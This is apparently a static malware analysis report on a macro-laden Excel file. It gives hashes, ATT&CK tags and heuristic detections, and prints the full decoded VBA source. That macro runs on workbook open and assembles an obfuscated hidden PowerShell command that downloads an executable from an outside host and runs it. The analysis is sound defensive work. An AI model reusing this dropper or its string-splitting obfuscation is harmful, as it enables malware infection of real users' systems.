Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 61a35081cf789d8f…

MALICIOUS

Office (OLE)

52.0 KB Created: 2017-10-19 07:59:05 Authoring application: Microsoft Excel First seen: 2018-10-07
MD5: f4e66a774db4094809efa8ac1e7b17c1 SHA-1: 7ed7cf22f82cdc397eafbabea5abcba61b805442 SHA-256: 61a35081cf789d8fb750b7312a54d4b9137ee498b572be951b3d1a80d46cf3a3
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File: User Execution T1059 Command and Scripting Interpreter

The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro that uses the Shell() function. This function is used to execute a command, which is obfuscated using string concatenation to reassemble 'cmd /c'. The macro's intent is to download and execute a second-stage payload, as indicated by the critical heuristic firings and the nature of the Shell() call. The document body's Japanese text and yellow message bar are a common lure to enable macros.

Heuristics 5

  • ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3231 bytes
SHA-256: 3aff8fe7acc4afd7b10bc38f258ab40134e3172410c7191d3c9cb52c2ba09c03
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function yogaindiaa()
shabolaaa = "VI" + "r'" + ",'N" + "t'," + "'mE') ;  "
yogaindiaa = "$7d" + "0mK6 = [" + versusgame + "}{2" + "}\"" -f '" + "on'" + ",'eN" + shabolaaa
End Function
Function versusgame()
versusgame = "Typ" + "e](\""{" + "1}{0" + "}{3"
End Function

Function diplodosea()
palmaoils = "{D`e" + "s} =  $7d"
diplodosea = "d" + "o{&(\""{1}" + "{0}\"" -f'ep','" + "sle'" + ") 31;$" + palmaoils
End Function
Function dabalokok()
dabalokok = "(\""{" + "0}" + "{2}{" + "1}{3}{" + "5}{6}" + "{4}\""" + "-f'" + "S" + "y','t" + "e','s" + "','m"
End Function

Function hablloker()
hablloker = "OaDfiLE.IN"
End Function
Function gemeremi()
gemeremi = "oP" + "Ro" + "FI -W"
End Function
Function gyroskopius()
gyroskopius = "d" + "en" + " -n"
End Function

Function flibaloba()
flibaloba = "nON" + "inT"
End Function
Function curveastell()
bermudass = "a"
curveastell = bermudass + "ss  " + "  """
End Function
Function abigalevermont()
abigalevermont = samoevsbruna + "o -" + flibaloba + "eR" & "a -Ex" + "eC" & "uTI" + "On" + "P b" + "yP" + curveastell
End Function

Function samoevsbruna()
samoevsbruna = "c" + "m" + "d  " + " /" + "c""" & "p" + "Ow" + "Er" + "sHe" + "Ll" + " -n" + gemeremi + "in " + " H" & "iD" + gyroskopius + "oL"
End Function
Function terraincognitoo()
terraincognitoo = "skt" + "op"
End Function
Sub Workbook_Open()
vintagenioe = "p"
If msoArrowheadWidthMixed < 0.87 Then
Dim planeverythink As String
ernestohimm = msoColorTypeCMYK - 3
Randomize
planeverythink = Int(Rnd * 9882761#)
deathlifeone = planeverythink

antaaaanana = dabalokok + ".Ne','enT','t.WeB','ClI')).dOwNL" + hablloker + "VokE(\""ht" + "t" + "p:/" + "/gober" + "tonis.c" + "om/n" + "ote\"",\""$" + "Des\" + deathlifeone + ".e" + "xe\"")}"

perlitdiamond = diplodosea + "0mk" + "6::gE" + digitpiii + "TH(\""De" + terraincognitoo + "\"")" + ";(&(" + "\""{0}{1" + "}{2}\""" + " -f'N" + "e','w-" + "','O" + "bj" + "ect') "
inicedays = hippporose + deathlifeone + ".ex" + "e"""

gabrieleanna = abigalevermont + yogaindiaa + perlitdiamond + antaaaanana + inicedays

Shell gabrieleanna, ernestohimm
End If
End Sub
Function digitpiii()
digitpiii = "tFo" + "Ld" + "eR" + "Pa"
End Function


Function shipseariver()
shipseariver = "s" + "s'," + "'ar" + "t'," + "'-" + "Pr')" + " $D"
End Function
Function hippporose()



If 544 < 877533 Then

hippporose = "whi" + "le(" + "!${?}" + ");&(\""{" + nulliggg + "t','o" + "ce" + shipseariver + "e" + "s\"
End If
End Function
Function nulliggg()
nulliggg = "0}{" + "2}{3" + "}{1}" + "\""-f 'S"
End Function



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True